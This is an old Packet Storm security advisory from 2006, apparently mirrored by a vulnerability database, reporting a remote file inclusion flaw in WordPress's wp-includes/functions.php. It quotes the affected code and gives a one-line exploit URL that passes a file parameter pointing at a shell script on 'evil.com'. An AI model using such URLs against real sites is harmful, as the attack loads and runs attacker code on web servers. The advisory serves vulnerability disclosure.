wordpress-rfi.txt

🗓️ 14 Nov 2006 00:00:00Reported by _ANtrAX_Type

packetstorm🔗 packetstormsecurity.com👁 29 Views

WordPress Remote File Inclusion vulnerability in wp-includes/functions.ph

`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
WordPress Remote File Inclusion  
Download:http://wordpress.org/latest.zip  
Found by _ANtrAX_ http://foro.c-group.org  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerable Code:   
{  
global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query,  
  
$wp_rewrite, $wpdb;  
  
  
extract($wp_query->query_vars);  
  
  
require_once($file);  
}  
.....  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Affected File:  
/wp-includes/functions.php =]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerability:  
www.site.com/wp-includes/functions.php?file=http://evil.com/shell.txt?  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Greetz:V4MP1R3Z4, FRE4K , PENNISSMEN ,EL GROXO , DEYABU ROOLZ , MATASANOS,C-GROUP STAFF . CHAPINHACK, SysRoot ¬¬  
`

14 Nov 2006 00:00Current

7.4High risk

Vulners AI Score7.4